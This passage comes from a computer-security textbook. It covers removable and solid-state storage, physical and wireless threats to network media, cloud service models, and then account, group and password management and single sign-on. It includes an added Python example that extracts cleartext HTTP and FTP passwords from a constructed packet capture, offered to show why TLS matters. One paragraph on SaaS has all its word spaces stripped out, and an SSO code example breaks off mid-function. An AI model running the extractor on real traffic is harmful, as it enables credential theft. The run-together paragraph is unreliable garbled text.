The latest version of optical disc is the Blu-ray disc. Using a smaller, violet-blue laser, this system can hold significantly more information than a DVD. Blu-ray discs can hold up to 128 GB in four layers. The transfer speed of Blu-ray, at over 48 Mbps, is over four times greater than that of DVD systems. Designed for high-definition (HD) video, Blu-ray offers significant storage for data as well.
Tech Tip
Backup Lifetimes
A common misconception is that data backed up onto magnetic media will last for long periods of time. Although once touted as lasting decades, modern micro-encoding methods are proving less durable than expected, sometimes with lifetimes less than ten years. A secondary problem is maintaining operating system access via drivers to legacy equipment. As technology moves forward, finding drivers for ten-year-old tape drives for Windows 7 or the latest version of Linux will prove to be a major hurdle.
DVDs now occupy the same role that CDs have in the recent past, except that they hold more than seven times the data of a CD. This makes full-length movie recording possible on a single disc. The increased capacity comes from finer tolerances and the fact that DVDs can hold data on both sides. A wide range of formats for DVDs include DVD+R, DVD-R, dual layer, and now HD formats, HD-DVD and Blu-ray. This variety is due to competing "standards" and can result in confusion. DVD+R and -R are distinguishable only when recording, and most devices since 2004 should read both. Dual layers add additional space but require appropriate dual-layer-enabled drives.
Electronic Media
The latest form of removable media is electronic memory. Electronic circuits of static memory, which can retain data even without power, fill a niche where high density and small size are needed. Originally used in audio devices and digital cameras, these electronic media come in a variety of vendor-specific types, such as smart cards, SmartMedia, SD cards, flash cards, memory sticks, and CompactFlash devices. These memory devices range from small card-like devices, of which microSD cards are smaller than dimes and hold 2 GB or more, to USB sticks that hold up to 64 GB. These devices are becoming ubiquitous, with new PCs and netbooks containing built-in slots to read them like any other storage device.

• SD, microSD, and CompactFlash cards

Although they are used primarily for photos and music, these devices could be used to move any digital information from one machine to another. To a machine equipped with a connector port, these devices look like any other file storage location. They can be connected to a system through a special reader or directly via a USB port. In newer PC systems, a USB boot device has replaced the older floppy drive. These devices are small, can hold a significant amount of data (over 128 GB at time of writing), and are easy to move from machine to machine. Another novel interface is a mouse that has a slot for a memory stick. This dual-purpose device conserves space, conserves USB ports, and is easy to use. The memory stick is placed in the mouse, which can then be used normally. The stick is easily removable and transportable. The mouse works with or without the memory stick; it is just a convenient device to use for a portal. From a security standpoint, storage hidden inside a peripheral is one more path for data to leave unnoticed, and endpoint device-control policies should treat it like any other USB mass-storage device.
The advent of large-capacity USB sticks has enabled users to build entire systems, OSs, and tools onto them to ensure security and veracity of the OS and tools. With the expanding use of virtualization, a user could carry an entire system on a USB stick and boot it using virtually any hardware. With USB 3.0 and its 5-Gbps signaling rate (roughly 640 MB/s), this is a highly versatile form of memory that enables many new capabilities.

• 128 GB USB 3.0 memory stick
Solid-State Hard Drives
With the rise of solid-state memory technologies comes a solid-state "hard drive." Solid-state drives (SSDs) are moving into mobile devices, desktops, and even servers. Memory densities per unit volume are significantly beyond those of spinning-platter drives, there are no moving parts to wear out or fail, and SSDs have vastly superior performance specifications. Figure 10.10 shows a 512 GB SSD from a laptop, on a half-height mini card mSATA interface. The only factor that has slowed the spread of this technology has been cost, but recent cost reductions have made this form of memory a first choice in many systems. One security difference matters at end of life: because an SSD's controller remaps writes across the flash (wear leveling), overwriting a file or even the whole visible disk does not reliably erase the old data, so sanitization should use the drive's built-in secure-erase or, on a self-encrypting drive, destruction of the key.

Figure 10.10 512 GB solid-state half-height mini card
Security Concerns for Transmission Media
The primary security concern for a system administrator has to be preventing physical access to a server by an unauthorized individual. Such access will almost always spell disaster, for with direct access and the correct tools, any system can be infiltrated. One of the administrator's next major concerns should be preventing unfettered access to a network connection. Access to switches and routers is almost as bad as direct access to a server, and access to network connections would rank third in terms of worst-case scenarios. Preventing such access is costly, yet the cost of replacing a server because of theft is also costly.
Physical Security Concerns
A balanced approach is the most sensible approach when addressing physical security, and this applies to transmission media as well. Keeping network switch rooms secure and cable runs secure seems obvious, but cases of using janitorial closets for this vital business purpose abound. One of the keys to mounting a successful attack on a network is information. Usernames, passwords, server locations: all of these can be obtained if someone has the ability to observe network traffic in a process called sniffing. A sniffer can record all the network traffic, and this data can be mined for accounts, passwords, and traffic content, all of which can be useful to an unauthorized user. One starting point for many intrusions is the insertion of an unauthorized sniffer into the network, with the fruits of its labors driving the remaining unauthorized activities. Many common scenarios exist when unauthorized entry to a network occurs, including these:
Inserting a node and functionality that is not authorized on the network, such as a sniffer device or unauthorized wireless access point
Modifying firewall security policies
Modifying ACLs for firewalls, switches, or routers
Modifying network devices to echo traffic to an external node
Network devices and transmission media become targets because they are dispersed throughout an organization, and physical security of many dispersed items can be difficult to manage. Although limiting physical access is difficult, it is essential. The least level of skill is still more than sufficient to accomplish unauthorized entry into a network if physical access to the network signals is allowed. This is one factor driving many organizations to use fiber-optics, for these cables are much more difficult to tap. Although many tricks can be employed with switches and VLANs to increase security, it is still essential that you prevent unauthorized contact with the network equipment.
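To make the sniffing threat concrete, an added example (not from the book) of what an attacker's sniffer mines once it sits on a tapped cable run. The "capture" is a constructed list of reassembled TCP stream fragments as (source, destination, destination port, payload); the extractor recovers credentials from HTTP Basic authentication, an HTTP form login, and an FTP login, and, for contrast, gets nothing from a TLS stream. Hosts, users, and passwords are all made up for the example.

```python
"""Added example (not from the book): credential extraction from a constructed
capture, showing what cleartext protocols hand to anyone with a cable tap."""
import base64
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs

Segment = Tuple[str, str, int, bytes]    # (src, dst, dst_port, payload)

BASIC_RE = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
FTP_USER_RE = re.compile(rb"^USER\s+(\S+)", re.MULTILINE)
FTP_PASS_RE = re.compile(rb"^PASS\s+(\S+)", re.MULTILINE)
FORM_FIELDS = ("password", "passwd", "pwd")


def extract_credentials(capture: List[Segment]) -> List[Dict[str, str]]:
    found = []
    ftp_user: Dict[Tuple[str, str], str] = {}   # USER and PASS arrive in separate commands
    for src, dst, port, data in capture:
        # HTTP Basic: the header carries base64(user:password), not a hash.
        for m in BASIC_RE.finditer(data):
            try:
                user, _, pw = base64.b64decode(m.group(1)).decode().partition(":")
            except Exception:
                continue
            found.append({"proto": "http-basic", "host": dst, "user": user, "password": pw})
        # HTTP form login over plain HTTP: the password is in the POST body.
        if data.startswith(b"POST ") and b"\r\n\r\n" in data:
            body = data.split(b"\r\n\r\n", 1)[1].decode(errors="replace")
            fields = parse_qs(body)
            pw_key = next((k for k in FORM_FIELDS if k in fields), None)
            if pw_key:
                user = fields.get("username", fields.get("user", ["?"]))[0]
                found.append({"proto": "http-form", "host": dst, "user": user,
                              "password": fields[pw_key][0]})
        # FTP control channel: pair PASS with the USER seen earlier on the same stream.
        if port == 21:
            u = FTP_USER_RE.search(data)
            if u:
                ftp_user[(src, dst)] = u.group(1).decode()
            p = FTP_PASS_RE.search(data)
            if p and (src, dst) in ftp_user:
                found.append({"proto": "ftp", "host": dst, "user": ftp_user[(src, dst)],
                              "password": p.group(1).decode()})
    return found


def demo() -> List[Dict[str, str]]:
    """Constructed capture: Basic auth, a form login, an FTP login, and a TLS hello."""
    basic = base64.b64encode(b"admin:Winter2016!").decode()
    capture: List[Segment] = [
        ("10.0.0.5", "intranet.example", 80,
         b"GET /reports HTTP/1.1\r\nHost: intranet.example\r\n"
         b"Authorization: Basic " + basic.encode() + b"\r\n\r\n"),
        ("10.0.0.7", "portal.example", 80,
         b"POST /login HTTP/1.1\r\nHost: portal.example\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
         b"username=jsmith&password=p%40ssw0rd&submit=Login"),
        ("10.0.0.9", "ftp.example", 21, b"USER backup\r\n"),
        ("10.0.0.9", "ftp.example", 21, b"PASS tape-key-42\r\n"),
        # TLS ClientHello; the HTTPS login that follows it is opaque to the sniffer.
        ("10.0.0.7", "bank.example", 443,
         b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + b"\x00" * 32),
    ]
    return extract_credentials(capture)
```

Three of the four logins come out in the clear. The defensive reading is the point of the section: keep the tap from happening, and, because that is never certain, put the protocols that still carry passwords unencrypted behind TLS or a VPN so that a successful tap yields what the last stream yields, nothing.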
Cross Check
Physical Infrastructure Security
The best first effort is to secure the actual network equipment to prevent this type of intrusion. As you should remember from Chapter 8, physical access to network infrastructure provides a myriad of issues, and most of them can be catastrophic with respect to security. Physically securing access to network components is one of the "must dos" of a comprehensive security effort.
Wireless networks make the intruder's task even easier, as they take the network to the users, authorized or not. A technique called war-driving involves using a laptop and software to find wireless networks from outside the premises. A typical use of war-driving is to locate a wireless network with poor (or no) security and obtain free Internet access, but other uses can be more devastating. A simple solution is to place a firewall between the wireless access point and the rest of the network and authenticate users before allowing entry. Business users use VPN technology to secure their connection to the Internet and other resources, and home users can do the same thing to prevent neighbors from "sharing" their Internet connections. To ensure that unauthorized traffic does not enter your network through a wireless access point, you must either use a firewall with an authentication system or establish a VPN. Neither does anything about traffic being read over the air, so the wireless link itself must also use strong encryption, which Chapter 12 covers.
Cloud Computing
Cloud computing is a common term used to describe computer services provided over a network. These computing services are computing, storage, applications, and services that are offered via the Internet Protocol. One of the characteristics of cloud computing is transparency to the end user. This improves usability of this form of service provisioning. Cloud computing offers much to the user: improvements in performance, scalability, flexibility, security, and reliability, among other items. These improvements are a direct result of the specific attributes associated with how cloud services are implemented. Security is a particular challenge when data and computation are handled by a remote party, as in cloud computing. The specific challenge is how one allows data outside the enterprise and yet remains in control over how the data is used, and the common answer is encryption. By properly encrypting data before it leaves the enterprise, external storage can still be performed securely. This only holds while the keys stay under the enterprise's control; data the provider must process in the clear, rather than merely store, cannot be protected this way. Clouds can be created by many entities, internal and external to an organization. Commercial cloud services are already available and offered by a variety of firms, as large as Google and Amazon, to smaller, local providers. Internal services can replicate the advantages of cloud computing while improving the utility of limited resources. The promise of cloud computing is improved utility and, as such, is marketed under the concepts of Software as a Service, Platform as a Service, and Infrastructure as a Service.
Private
If your organization is highly sensitive to sharing resources, you may wish to consider the use of a private cloud. Private clouds are essentially reserved resources used only for your organization: your own little cloud within the cloud. This service will be considerably more expensive, but it should also carry less exposure and should enable your organization to better define the security, processing, and handling of data that occurs within your cloud.
Public
The term public cloud refers to when the cloud service is rendered over a system that is open for public use. In most cases, there is little operational difference between public and private cloud architectures, but the security ramifications can be substantial. Although public cloud services will separate users with security restrictions, the depth and level of these restrictions, by definition, will be significantly less in a public cloud.
Hybrid
A hybrid cloud structure is one where elements are combined from private, public, and community cloud structures. When examining a hybrid structure, you need to remain cognizant that operationally these differing environments may not actually be joined, but rather used together. Sensitive information can be stored in the private cloud and issue-related information can be stored in the community cloud, all of which is accessed by an application. This makes the overall system a hybrid cloud system.
Community
A community cloud system is one where several organizations with a common interest share a cloud environment for the specific purposes of the shared endeavor. For example, local public entities and key local firms may share a community cloud dedicated to serving the interests of community initiatives. This can be an attractive cost-sharing mechanism for specific data-sharing initiatives.
ExamTip:BesureyouunderstandthedifferencesbetweencloudcomputingservicemodelsPlatformasaService,SoftwareasaService,andInfrastructureasaService.
SoftwareasaServiceSoftwareasaService(SaaS)istheofferingofsoftwaretoendusersfromwithinthecloud.Ratherthaninstallingsoftwareonclientmachines,SaaSactsassoftwareondemandwherethesoftwarerunsfromthecloud.Thishasseveraladvantages,asupdatesareoftenseamlesstoendusersandintegrationbetweencomponentsisenhanced.
Platform as a Service
Platform as a Service (PaaS) is a marketing term used to describe the offering of a computing platform in the cloud. Multiple sets of software, working together to provide services, such as database services, can be delivered via the cloud as a platform.
Infrastructure as a Service
Infrastructure as a Service (IaaS) is a term used to describe cloud-based systems that are delivered as a virtual platform for computing. Rather than building data centers, IaaS allows firms to contract for utility computing as needed.
Chapter 10 Review
Lab Manual Exercise
The following lab exercise from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provides practical application of material covered in this chapter:
Lab 7.3l Configuring a Personal Firewall in Linux
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following aspects of networking and secure infrastructures.
Construct networks using different types of network devices
Understand the differences between basic network devices, such as hubs, bridges, switches, and routers.
Understand the security implications of network devices and how to construct a secure network infrastructure.
Enhance security using security devices
Understand the use of firewalls, next-generation firewalls, and intrusion detection systems.
Understand the role of load balancers and proxy servers as part of a secure network solution.
Understand the use of security appliances, such as web security gateways, data loss prevention, and unified threat management.
Enhance security using NAC/NAP methodologies
The Cisco NAC protocol and the Microsoft NAP protocol provide security functionality when attaching devices to a network.
NAC and NAP play a crucial role in the securing of infrastructure as devices enter and leave the network.
NAC and NAP can be used together to take advantage of the strengths and investments in each technology to form a strong network admission methodology.
Identify the different types of media used to carry network signals
Guided and unguided media can both carry network traffic.
Wired technology, from coax cable through twisted-pair Ethernet, provides a cost-effective means of carrying network traffic.
Fiber technology is used to carry higher bandwidth.
Unguided media, including infrared and RF (including wireless and Bluetooth), provide short-range network connectivity.
Describe the different types of storage media used to store information
There is a wide array of removable media types, from memory sticks to optical discs to portable drives.
Data storage on removable media, because of increased physical access, creates significant security implications.
Use basic terminology associated with network functions related to information security
Understanding and using the correct vocabulary for device names and relationships to networking is important as a security professional.
Security appliances add terminology, including specific items for IDS and firewalls.
Describe the different types and uses of cloud computing
Understand the types of clouds in use.
Understand the use of Software as a Service, Infrastructure as a Service, and Platform as a Service.
Key Terms
basic packet filtering (261), bridge (257), cloud computing (283), coaxial cable (274), collision domain (257), concentrator (264), data loss prevention (DLP) (272), firewall (260), hub (257), Infrastructure as a Service (IaaS) (284), Internet content filter (272), load balancer (269), modem (265), network access control (267), Network Access Protection (NAP) (267), Network Admission Control (NAC) (268), Network Attached Storage (NAS) (255), network interface card (NIC) (256), network operations center (NOC) (268), next-generation firewall (263), Platform as a Service (PaaS) (284), private branch exchange (PBX) (266), proxy server (270), router (258), sandboxing (255), servers (253), shielded twisted-pair (STP) (275), Software as a Service (SaaS) (284), solid-state drive (SSD) (281), switch (257), unified threat management (UTM) (272), unshielded twisted-pair (UTP) (275), virtualization (254), web security gateway (271), wireless access point (264), workstation (253)
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.
1. A(n) _______________ routes packets based on IP addresses.
2. To offer software to end users from the cloud is a form of _______________.
3. To connect a computer to a network, you use a(n) _______________.
4. A(n) _______________ or _______________ distributes traffic based on MAC addresses.
5. To verify that a computer is properly configured to connect to a network, the network can use _______________.
6. _______________ is a name for the typical computer a user uses on a network.
7. A(n) _______________ repeats all data traffic across all connected ports.
8. Cat 5 is an example of _______________ cable.
9. Basic packet filtering occurs at the ____________.
10. A(n) _______________ is an extension of the telephone service into a firm's telecommunications network.
Multiple-Choice Quiz
1. Switches operate at which layer of the OSI model?
A. Physical layer
B. Network layer
C. Data link layer
D. Application layer
2. UTP cables are terminated for Ethernet using what type of connector?
A. A BNC plug
B. An Ethernet connector
C. A standard phone jack connector
D. An RJ-45 connector
3. Coaxial cable carries how many physical channels?
A. Two
B. Four
C. One
D. None of the above
4. Network access control is associated with which of the following?
A. NAP
B. IPsec
C. IPv6
D. NAT
5. The purpose of twisting the wires in twisted-pair circuits is to:
A. Increase speed
B. Increase bandwidth
C. Reduce crosstalk
D. Allow easier tracing
6. Microsoft NAP permits:
A. Restriction of connections to a restricted subnet only
B. Checking of a client OS patch level before a network connection is permitted
C. Denial of a connection based on client policy settings
D. All of the above
7. SNMP is a protocol used for which of the following functions?
A. Secure e-mail
B. Secure encryption of network packets
C. Remote access to user workstations
D. Remote access to network infrastructure
8. Firewalls can use which of the following in their operation?
A. Stateful packet inspection
B. Port blocking to deny specific services
C. NAT to hide internal IP addresses
D. All of the above
9. SMTP is a protocol used for which of the following functions?
A. E-mail
B. Secure encryption of network packets
C. Remote access to user workstations
D. None of the above
10. USB-based flash memory is characterized by:
A. High cost
B. Low capacity
C. Slow access
D. None of the above
Essay Quiz
1. Compare and contrast routers and switches by describing what the advantages and disadvantages are of each.
2. Describe the common threats to the transmission media in a network, by type of transmission media.
Lab Projects
• Lab Project 10.1 Using two PCs and a small home office–type router, configure them to communicate across the network with each other.
• Lab Project 10.2 Demonstrate network connectivity using Windows command-line tools.
Chapter 11 Authentication and Remote Access
We should set a national goal of making computers and Internet access available for every American.
—WILLIAM JEFFERSON CLINTON
In this chapter, you will learn how to
Identify the differences among user, group, and role management
Implement password and domain password policies
Describe methods of account management (SSO, time of day, logical token, account expiration)
Describe methods of access management (MAC, DAC, and RBAC)
Discuss the methods and protocols for remote access to networks
Identify authentication, authorization, and accounting (AAA) protocols
Explain authentication methods and the security implications in their use
Implement virtual private networks (VPNs) and their security aspects
Describe Internet Protocol Security (IPsec) and its use in securing communications
On single-user systems such as PCs, the individual user typically has access to most of the system's resources, processing capability, and stored data. On multiuser systems, such as servers and mainframes, an individual user typically has very limited access to the system and the data stored on that system. An administrator responsible for managing and maintaining the multiuser system has much greater access. So how does the computer system know which users should have access to what data? How does the operating system know what applications a user is allowed to use?
On early computer systems, anyone with physical access had fairly significant rights to the system and could typically access any file or execute any application. As computers became more popular and it became obvious that some way of separating and restricting users was needed, the concepts of users, groups, and privileges came into being (privileges mean you have the ability to "do something" on a computer system such as create a directory, delete a file, or run a program). These concepts continue to be developed and refined and are now part of what we call privilege management.
Privilege management is the process of restricting a user's ability to interact with the computer system. Essentially, everything a user can do to or with a computer system falls into the realm of privilege management. Privilege management occurs at many different points within an operating system or even within applications running on a particular operating system.
Remote access is another key issue for multiuser systems in today's world of connected computers. Isolated computers, not connected to networks or the Internet, are rare items these days. Except for some special-purpose machines, most computers need interconnectivity to fulfill their purpose. Remote access enables users outside a network to have network access and privileges as if they were inside the network. Being outside a network means that the user is working on a machine that is not physically connected to the network and must therefore establish a connection through a remote means, such as by dialing in, connecting via the Internet, or connecting through a wireless connection.
Authentication is the process of establishing a user's identity to enable the granting of permissions. To establish network connections, a variety of methods are used, the choice of which depends on network type, the hardware and software employed, and any security requirements.
User, Group, and Role Management
To manage the privileges of many different people effectively on the same system, a mechanism for separating people into distinct entities (users) is required, so you can control access on an individual level. At the same time, it's convenient and efficient to be able to lump users together when granting many different people (groups) access to a resource at the same time. At other times, it's useful to be able to grant or restrict access based on a person's job or function within the organization (role). While you can manage privileges on the basis of users alone, managing user, group, and role assignments together is far more convenient and efficient.
Tech Tip
User ID vs. Username
The terms "user ID" and "username" are sometimes used interchangeably, but traditionally the term user ID is more often associated with UNIX operating systems. In UNIX operating systems, each user is identified by an unsigned integer called a user identifier, often shortened to user ID.
User
The term user generally applies to any person accessing a computer system. In privilege management, a user is a single individual, such as "John Forthright" or "Sally Jenkins." This is generally the lowest level addressed by privilege management and the most common area for addressing access, rights, and capabilities. When accessing a computer system, each user is generally given a username—a unique alphanumeric identifier he or she will use to identify himself or herself when logging into or accessing the system. When developing a scheme for selecting usernames, you should keep in mind that usernames must be unique to each user, but they must also be fairly easy for the user to remember and use.
Exam Tip: A username is a unique alphanumeric identifier used to identify a user to a computer system. Permissions control what a user is allowed to do with objects on a computer system—what files they can open, what printers they can use, and so on. In Windows security models, permissions define the actions a user can perform on an object (open a file, delete a folder, and so on). Rights define the actions a user can perform on the system itself, such as change the time, adjust auditing levels, and so on. Rights are typically applied to operating system–level tasks.
With some notable exceptions, in general a user who wants to access a computer system must first have a username created for him on the system he wishes to use. This is usually done by a system administrator, security administrator, or other privileged user, and this is the first step in privilege management—a user should not be allowed to create their own account. Once the account is created and a username is selected, the administrator can assign specific permissions to that user. Permissions control what the user is allowed to do with objects on the system—which files he may access, which programs he may execute, and so on. While PCs typically have only one or two user accounts, larger systems such as servers and mainframes can have hundreds of accounts on the same system. Figure 11.1 shows the Users management tab of the Computer Management utility on a Windows Server 2008 system. Note that several user accounts have been created on this system, each identified by a unique username.
• Figure 11.1 Users tab on a Windows Server 2008 system
A few "special" user accounts don't typically match up one-to-one with a real person. These accounts are reserved for special functions and typically have much more access and control over the computer system than the average user account. Two such accounts are the administrator account under Windows and the root account under UNIX. Each of these accounts is also known as the superuser—if something can be done on the system, the superuser has the power to do it. These accounts are not typically assigned to a specific individual and are restricted, accessed only when the full capabilities of that account are required.
Auditing user accounts, group membership, and password strength on a regular basis is an extremely important security control. Many compliance audits focus on the presence or lack of industry-accepted security controls.
Due to the power possessed by these accounts, and the few, if any, restrictions placed on them, they must be protected with strong passwords that are not easily guessed or obtained. These accounts are also the most common targets of attackers—if the attacker can gain root access or assume the privilege level associated with the root account, she can bypass most access controls and accomplish anything she wants on that system.
Tech Tip
Generic Accounts
Generic accounts are accounts without a named user behind them. These can be employed for special purposes, such as running services and batch processes, but because they cannot be attributed to an individual, they should not have login ability. It is also important that if they have elevated privileges, their activities be continually monitored as to what functions they are performing versus what they are expected to be doing. General use of generic accounts should be avoided because of the increased risk associated with no attribution capability.
Another account that falls into the "special" category is the system account used by Windows operating systems. The system account has the same file privileges as the administrator account and is used by the operating system and by services that run under Windows. By default, the system account is granted full control to all files on an NTFS volume. Services and processes that need the capability to log on internally within Windows will use the system account—for example, the DNS Server and DHCP Server services in Windows Server 2008 use the LocalSystem account.
Group
Under privilege management, a group is a collection of users with some common criteria, such as a need for access to a particular dataset or group of applications. A group can consist of one user or hundreds of users, and each user can belong to one or more groups. Figure 11.2 shows a common approach to grouping users—building groups based on job function.
• Figure 11.2 Logical representation of groups
By assigning membership in a specific group to a user, you make it much easier to control that user's access and privileges. For example, if every member of the engineering department needs access to product development documents, administrators can place all the users in the engineering department in a single group and allow that group to access the necessary documents. Once a group is assigned permissions to access a particular resource, adding a new user to that group will automatically allow that user to access that resource. In effect, the user "inherits" the permissions of the group as soon as she is placed in that group. As Figure 11.3 shows, a computer system can have many different groups, each with its own rights and permissions.
• Figure 11.3 Groups tab on a Windows Server 2008 system
As you can see from the description for the Administrators group in Figure 11.3, this group has complete and unrestricted access to the system. This includes access to all files, applications, and datasets. Anyone who belongs to the Administrators group or is placed in this group will have a great deal of access and control over the system.
Some operating systems, such as Windows, have built-in groups—groups that are already defined within the operating system, such as Administrators, Power Users, and Everyone. The whole concept of groups revolves around making the tasks of assigning and managing permissions easier, and built-in groups certainly help to make these tasks easier. Individual user accounts can be added to built-in groups, allowing administrators to grant permission sets to users quickly and easily without having to specify permissions manually. For example, adding a user account named "bjones" to the Power Users group gives bjones all the permissions assigned to the built-in Power Users group, such as installing drivers, modifying settings, and installing software.
Role
Another common method of managing access and privileges is by roles. A role is usually synonymous with a job or set of functions. For example, the role of security admin in Microsoft SQL Server may be applied to someone who is responsible for creating and managing logins, reading error logs, and auditing the application. Security admins need to accomplish specific functions and need access to certain resources that other users do not—for example, they need to be able to create and delete logins, open and read error logs, and so on. In general, anyone serving in the role of security admin needs the same rights and privileges as every other security admin. For simplicity and efficiency, rights and privileges can be assigned to the role security admin, and anyone assigned to fulfill that role automatically has the correct rights and privileges to perform the required tasks.
Password Policies
The username/password combination is by far the most common means of controlling access to applications, websites, and computer systems. The average user may have a dozen or more username and password combinations between school, work, and personal use. To help users select a good, difficult-to-guess password, most organizations implement and enforce a password policy, which typically has the following components:
Tech Tip
TOTP
A Time-based One-Time Password (TOTP) generator uses the current time as one of the seeds in a one-time password. This prevents replay attacks utilizing a captured password.
Password construction: How many characters a password should have; the use of capitalization, numbers, and special characters; not basing the password on a dictionary word or personal information; not making the password a slight modification of an existing password; and so on
Reuse restrictions: Whether or not passwords can be reused, and, if so, with what frequency (how many different passwords must you use before you can use one you've used before)
Duration: The minimum and maximum number of days a password can be used before it can be changed or must be changed
Protection of passwords: Not writing down passwords where others can find them, not saving passwords and not allowing automated logins, not sharing passwords with other users, and so on
Consequences: Consequences associated with violation of or noncompliance with the policy
The SANS Institute offers several examples of password policies (along with many other common information security policies) on its website (www.sans.org—type password policy into the search box at the top of the SANS website). The overall guidance established by the organization's security policy should be refined into specific guidance that administrators can enforce at the operating system level.
Exam Tip: A password policy is a set of rules designed to enhance computer security by requiring users to employ and maintain strong passwords. A domain password policy is a password policy that applies to a specific domain.
Domain Password Policy
A domain password policy is a password policy for a specific domain. As these policies are usually associated with the Windows operating system, a domain password policy is implemented and enforced on the domain controller, which is a computer that responds to security authentication requests, such as logging into a computer, for a Windows domain. The domain password policy usually falls under a group policy object (GPO) and has the following elements (see Figure 11.4):
• Figure 11.4 Password policy options in Windows Local Security Policy
Enforce password history: Tells the system how many passwords to remember and does not allow a user to reuse an old password.
Maximum password age: Specifies the maximum number of days a password may be used before it must be changed.
Minimum password age: Specifies the minimum number of days a password must be used before it can be changed again.
Minimum password length: Specifies the minimum number of characters that must be used in a password.
Password must meet complexity requirements: Specifies that the password must meet the minimum length requirement and have characters from at least three of the following four groups: English uppercase characters (A through Z), English lowercase characters (a through z), numerals (0 through 9), and non-alphabetic characters (such as !, $, #, %).
Store passwords using reversible encryption: Reversible encryption is a form of encryption that can easily be decrypted and is essentially the same as storing a plaintext version of the password (because it's so easy to reverse the encryption and get the password). This should be used only when applications use protocols that require the user's password for authentication (such as Challenge-Handshake Authentication Protocol, or CHAP).
Not only is it essential to ensure every account has a strong password, but also it is essential to disable or delete unnecessary accounts. If your system does not need to support guest or anonymous accounts, then disable them. When user or administrator accounts are no longer needed, remove or disable them. As a best practice, all user accounts should be audited periodically to ensure there are no unnecessary, outdated, or unneeded accounts on your systems.
Domains are logical groups of computers that share a central directory database, known as the Active Directory database for the more recent Windows operating systems. The database contains information about the user accounts and security information for all resources identified within the domain. Each user within the domain is assigned his or her own unique account (that is, a domain is not a single account shared by multiple users), which is then assigned access to specific resources within the domain. In operating systems that provide domain capabilities, the password policy is set in the root container for the domain and applies to all users within that domain.
Setting a password policy for a domain is similar to setting other password policies in that the same critical elements need to be considered (password length, complexity, life, and so on). If a change to one of these elements is desired for a group of users, a new domain needs to be created because the domain is considered a security boundary. In a Windows operating system that employs Active Directory, the domain password policy can be set in the Active Directory Users and Computers menu in the Administrative Tools section of the Control Panel.
Tech Tip
Calculating Unique Password Combinations
One of the primary reasons administrators require users to have longer passwords that use upper- and lowercase letters, numbers, and at least one "special" character is to help deter password-guessing attacks. One popular password-guessing technique, called a brute-force attack, uses software to guess every possible password until one matches a user's password. Essentially, a brute-force attack tries a, then aa, then aaa, and so on until it runs out of combinations or gets a password match. Increasing both the pool of possible characters that can be used in the password and the number of characters required in the password can exponentially increase the number of "guesses" a brute-force program needs to perform before it runs out of possibilities. For example, if our password policy requires a three-character password that uses only lowercase letters, there are only 17,576 possible passwords (26 possible characters, 3 characters long is 26^3 combinations). Requiring a six-character password increases that number to 308,915,776 possible passwords (26^6). An eight-character password with upper- and lowercase, special symbol, and a number increases the possible passwords to 70^8, or over 576 trillion combinations. Precomputed hashes in rainbow tables can also be used to brute force past shorter passwords. As the length increases, so does the size of the rainbow table.
Single Sign-On
To use a system, users must be able to access it, which they usually do by supplying their user IDs (or usernames) and corresponding passwords. As any security administrator knows, the more systems a particular user has access to, the more passwords that user must have and remember. The natural tendency for users is to select passwords that are easy to remember, or even the same password for use on the multiple systems they access. Wouldn't it be easier for the user simply to log in once and have to remember only a single, good password? This is made possible with a technology called single sign-on.
Single sign-on (SSO) is a form of authentication that involves the transferring of credentials between systems. As more and more systems are combined in daily use, users are forced to have multiple sets of credentials. A user may have to log in to three, four, five, or even more systems every day just to do her job. Single sign-on allows a user to transfer her credentials, so that logging into one system acts to log her into all of them. Once the user has entered a user ID and password, the single sign-on system passes these credentials transparently to other systems so that repeated logons are not required. Put simply, you supply the right username and password once and you have access to all the applications and data you need, without having to log in multiple times and remember many different passwords. From a user standpoint, SSO means you need to remember only one username and one password. From an administration standpoint, SSO can be easier to manage and maintain. From a security standpoint, SSO can be even more secure, as users who need to remember only one password are less likely to choose something too simple or something so complex they need to write it down. Figure 11.5 shows a logical depiction of the SSO process:
• Figure 11.5 Single sign-on process
1. The user signs in once, providing a username and password to the SSO server.
2. The SSO server provides authentication information to any resource the user accesses during that session. The server interfaces with the other applications and systems—the user does not need to log in to each system individually.
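The two-step exchange above, worked through as an added example (not code from the book or any real SSO product): a hypothetical SSO server verifies the password once and issues a signed, time-limited ticket; the applications verify the ticket's signature and expiry with a key they share with the server and never see the password. The shared-key ticket, the sample user and the timestamps are this example's own assumptions; real SSO systems use protocols such as Kerberos or SAML, which are not implemented here.

```python
import base64
import binascii
import hashlib
import hmac
import json
import os

# Hypothetical minimal SSO: one sign-in at the SSO server yields a signed,
# time-limited ticket that every participating application verifies with a key
# it shares with the server (a simplification of real SSO protocols).


def _hash_password(password: str, salt: bytes) -> bytes:
    # Passwords are stored salted and hashed, never reversibly encrypted.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


class SsoServer:
    """Step 1: authenticates the user once and issues the ticket other systems trust."""

    def __init__(self, signing_key: bytes, ttl_seconds: int = 3600):
        self.key = signing_key
        self.ttl = ttl_seconds
        self.users = {}  # username -> (salt, digest); constructed sample directory

    def add_user(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self.users[username] = (salt, _hash_password(password, salt))

    def sign_in(self, username: str, password: str, now: int):
        """Returns a ticket string, or None when the credentials are wrong."""
        record = self.users.get(username)
        if record is None:
            return None
        salt, digest = record
        if not hmac.compare_digest(_hash_password(password, salt), digest):
            return None
        claims = {"sub": username, "iat": now, "exp": now + self.ttl}
        payload = json.dumps(claims, sort_keys=True).encode()
        signature = hmac.new(self.key, payload, hashlib.sha256).digest()
        return (base64.urlsafe_b64encode(payload).decode() + "."
                + base64.urlsafe_b64encode(signature).decode())


class Application:
    """Step 2: a resource that accepts the ticket instead of asking for a password again."""

    def __init__(self, name: str, verification_key: bytes):
        self.name = name
        self.key = verification_key

    def access(self, ticket: str, now: int):
        """Returns the authenticated username, or None if the ticket is invalid or expired."""
        try:
            payload_b64, signature_b64 = ticket.split(".")
            payload = base64.urlsafe_b64decode(payload_b64)
            signature = base64.urlsafe_b64decode(signature_b64)
        except (ValueError, binascii.Error):
            return None
        expected = hmac.new(self.key, payload, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, signature):
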